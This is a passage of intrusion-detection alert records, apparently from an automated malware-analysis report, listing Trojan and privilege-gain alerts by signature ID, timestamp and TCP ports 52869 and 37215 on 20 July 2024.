                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.304767
                      SID:2025132
                      Source Port:34786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.654988
                      SID:2829579
                      Source Port:60584
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.111381
                      SID:2829579
                      Source Port:60172
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.074222
                      SID:2831300
                      Source Port:48114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:56.768240
                      SID:2027339
                      Source Port:43520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.818830
                      SID:2835222
                      Source Port:33378
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.121284
                      SID:2025132
                      Source Port:43794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.290518
                      SID:2025132
                      Source Port:40086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.765093
                      SID:2027339
                      Source Port:46870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.067320
                      SID:2831300
                      Source Port:35074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.129029
                      SID:2025132
                      Source Port:34930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.509004
                      SID:2027339
                      Source Port:42880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.118165
                      SID:2829579
                      Source Port:39384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.885895
                      SID:2835222
                      Source Port:48754
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.149410
                      SID:2027339
                      Source Port:34424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:40.696155
                      SID:2025132
                      Source Port:40442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.233561
                      SID:2027339
                      Source Port:39054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.594120
                      SID:2831300
                      Source Port:58402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.578116
                      SID:2027339
                      Source Port:34374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.589760
                      SID:2831300
                      Source Port:51690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.619598
                      SID:2831300
                      Source Port:36368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.664887
                      SID:2829579
                      Source Port:49380
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.527234
                      SID:2831300
                      Source Port:48880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:06.806210
                      SID:2027339
                      Source Port:44198
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.565610
                      SID:2027339
                      Source Port:43736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.333070
                      SID:2831300
                      Source Port:56100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.852550
                      SID:2027339
                      Source Port:41846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.996987
                      SID:2027339
                      Source Port:39666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.345402
                      SID:2027339
                      Source Port:48096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.133778
                      SID:2025132
                      Source Port:56752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.488676
                      SID:2025132
                      Source Port:36638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.107223
                      SID:2027339
                      Source Port:56572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.323363
                      SID:2025132
                      Source Port:57652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221550
                      SID:2835222
                      Source Port:37826
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.425298
                      SID:2027339
                      Source Port:48686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.014531
                      SID:2025132
                      Source Port:43234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.163877
                      SID:2027339
                      Source Port:33238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.380657
                      SID:2027339
                      Source Port:47818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.113054
                      SID:2835222
                      Source Port:42612
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.609855
                      SID:2831300
                      Source Port:38658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.146350
                      SID:2027339
                      Source Port:47110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.296756
                      SID:2829579
                      Source Port:53070
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.135090
                      SID:2027339
                      Source Port:39010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.975117
                      SID:2829579
                      Source Port:52270
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.916673
                      SID:2025132
                      Source Port:35716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.633275
                      SID:2835222
                      Source Port:39114
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.170008
                      SID:2831300
                      Source Port:40856
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.178062
                      SID:2835222
                      Source Port:44596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.303669
                      SID:2027339
                      Source Port:49992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.562013
                      SID:2027339
                      Source Port:54784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.415588
                      SID:2027339
                      Source Port:53256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.071126
                      SID:2025132
                      Source Port:44716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.038105
                      SID:2027339
                      Source Port:37582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633810
                      SID:2829579
                      Source Port:45072
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.097795
                      SID:2835222
                      Source Port:40554
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.943232
                      SID:2027339
                      Source Port:43862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.832675
                      SID:2027339
                      Source Port:59242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.442441
                      SID:2025132
                      Source Port:60254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.093903
                      SID:2835222
                      Source Port:49164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.188348
                      SID:2027339
                      Source Port:51040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.156801
                      SID:2025132
                      Source Port:33870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:25.848287
                      SID:2027339
                      Source Port:42276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.995803
                      SID:2027339
                      Source Port:34792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.545885
                      SID:2025132
                      Source Port:59122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.981855
                      SID:2835222
                      Source Port:50494
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.169212
                      SID:2831300
                      Source Port:56148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:21.931985
                      SID:2835222
                      Source Port:51232
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.906354
                      SID:2027339
                      Source Port:43652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.700893
                      SID:2027339
                      Source Port:55240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.048618
                      SID:2829579
                      Source Port:43842
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:07.984371
                      SID:2027339
                      Source Port:42256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.642449
                      SID:2829579
                      Source Port:54306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.554229
                      SID:2831300
                      Source Port:45798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:12.682460
                      SID:2027339
                      Source Port:58340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221482
                      SID:2829579
                      Source Port:40150
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.066908
                      SID:2829579
                      Source Port:55990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.334452
                      SID:2835222
                      Source Port:41888
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.672378
                      SID:2831300
                      Source Port:44018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:03.882859
                      SID:2025132
                      Source Port:59642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.684499
                      SID:2831300
                      Source Port:44404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.076704
                      SID:2025132
                      Source Port:44404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.196522
                      SID:2831300
                      Source Port:53258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.877061
                      SID:2025132
                      Source Port:42084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.262010
                      SID:2025132
                      Source Port:40798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:01.391563
                      SID:2025132
                      Source Port:52480
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.974514
                      SID:2835222
                      Source Port:39410
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:43.591633
                      SID:2025132
                      Source Port:33168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.236294
                      SID:2025132
                      Source Port:41822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.547484
                      SID:2027339
                      Source Port:53402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.916250
                      SID:2835222
                      Source Port:54286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.107449
                      SID:2027339
                      Source Port:55444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.455918
                      SID:2831300
                      Source Port:47652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.020591
                      SID:2025132
                      Source Port:58950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.303669
                      SID:2025132
                      Source Port:52976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.207937
                      SID:2027339
                      Source Port:40814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.634497
                      SID:2835222
                      Source Port:55680
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.098209
                      SID:2829579
                      Source Port:36964
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.051104
                      SID:2835222
                      Source Port:58588
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.636533
                      SID:2835222
                      Source Port:58024
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.882275
                      SID:2831300
                      Source Port:46336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.761962
                      SID:2027339
                      Source Port:48840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:08.826483
                      SID:2027339
                      Source Port:38298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.571223
                      SID:2027339
                      Source Port:34950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.389453
                      SID:2025132
                      Source Port:40138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.053251
                      SID:2831300
                      Source Port:37770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:56.536207
                      SID:2027339
                      Source Port:50732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.321189
                      SID:2831300
                      Source Port:55696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.021704
                      SID:2831300
                      Source Port:38126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.275864
                      SID:2831300
                      Source Port:34734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.430595
                      SID:2027339
                      Source Port:52592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.742499
                      SID:2027339
                      Source Port:58056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.611556
                      SID:2027339
                      Source Port:43152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.142802
                      SID:2025132
                      Source Port:58582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.096837
                      SID:2027339
                      Source Port:49762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221248
                      SID:2835222
                      Source Port:44040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.676169
                      SID:2025132
                      Source Port:49278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.044223
                      SID:2835222
                      Source Port:36714
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.563416
                      SID:2027339
                      Source Port:42218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.863393
                      SID:2831300
                      Source Port:52952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.048825
                      SID:2829579
                      Source Port:39294
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.024775
                      SID:2025132
                      Source Port:45402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.646615
                      SID:2831300
                      Source Port:52406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.663629
                      SID:2027339
                      Source Port:34096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.101402
                      SID:2831300
                      Source Port:49536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.939279
                      SID:2831300
                      Source Port:33890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.098209
                      SID:2835222
                      Source Port:37260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.197088
                      SID:2027339
                      Source Port:41930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:15.172220
                      SID:2027339
                      Source Port:50336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.113661
                      SID:2027339
                      Source Port:58152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.989167
                      SID:2829579
                      Source Port:59048
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.183470
                      SID:2027339
                      Source Port:47738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.004683
                      SID:2027339
                      Source Port:38520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.462291
                      SID:2831300
                      Source Port:51560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.403768
                      SID:2027339
                      Source Port:47372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.920103
                      SID:2025132
                      Source Port:57122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:56.832956
                      SID:2027339
                      Source Port:42474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.090121
                      SID:2831300
                      Source Port:43510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.985320
                      SID:2025132
                      Source Port:34902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.054782
                      SID:2829579
                      Source Port:58546
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.769239
                      SID:2831300
                      Source Port:32774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.756264
                      SID:2027339
                      Source Port:49132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.622888
                      SID:2025132
                      Source Port:57520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:14.728323
                      SID:2027339
                      Source Port:55190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221048
                      SID:2829579
                      Source Port:36278
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.045749
                      SID:2835222
                      Source Port:48132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.885849
                      SID:2835222
                      Source Port:37860
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.320867
                      SID:2025132
                      Source Port:60014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:59.188717
                      SID:2831300
                      Source Port:50172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.639230
                      SID:2835222
                      Source Port:56502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.515992
                      SID:2025132
                      Source Port:52026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:59.643531
                      SID:2025132
                      Source Port:44200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:48.060990
                      SID:2027339
                      Source Port:33080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.660997
                      SID:2831300
                      Source Port:39540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:56.925238
                      SID:2027339
                      Source Port:53866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.364551
                      SID:2027339
                      Source Port:48446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.098080
                      SID:2835222
                      Source Port:33920
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.161892
                      SID:2829579
                      Source Port:41506
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.641498
                      SID:2835222
                      Source Port:47806
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.054782
                      SID:2829579
                      Source Port:46730
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.469580
                      SID:2027339
                      Source Port:57460
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.321189
                      SID:2027339
                      Source Port:58236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044538
                      SID:2829579
                      Source Port:39770
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.645186
                      SID:2835222
                      Source Port:50596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.453936
                      SID:2025132
                      Source Port:34994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.651026
                      SID:2835222
                      Source Port:57736
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.889164
                      SID:2835222
                      Source Port:58940
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.864629
                      SID:2831300
                      Source Port:40650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.613165
                      SID:2027339
                      Source Port:57364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.867858
                      SID:2835222
                      Source Port:53214
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.158487
                      SID:2831300
                      Source Port:50088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:17.128772
                      SID:2025132
                      Source Port:41086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.589760
                      SID:2831300
                      Source Port:39636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.280418
                      SID:2027339
                      Source Port:51174
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.787907
                      SID:2831300
                      Source Port:43580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.727671
                      SID:2027339
                      Source Port:41428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.859884
                      SID:2027339
                      Source Port:57070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.828422
                      SID:2829579
                      Source Port:38032
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.022868
                      SID:2025132
                      Source Port:51944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:04.052371
                      SID:2027339
                      Source Port:52100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.349275
                      SID:2829579
                      Source Port:55334
                      Destination Port:37215
                      Protocol:TCP
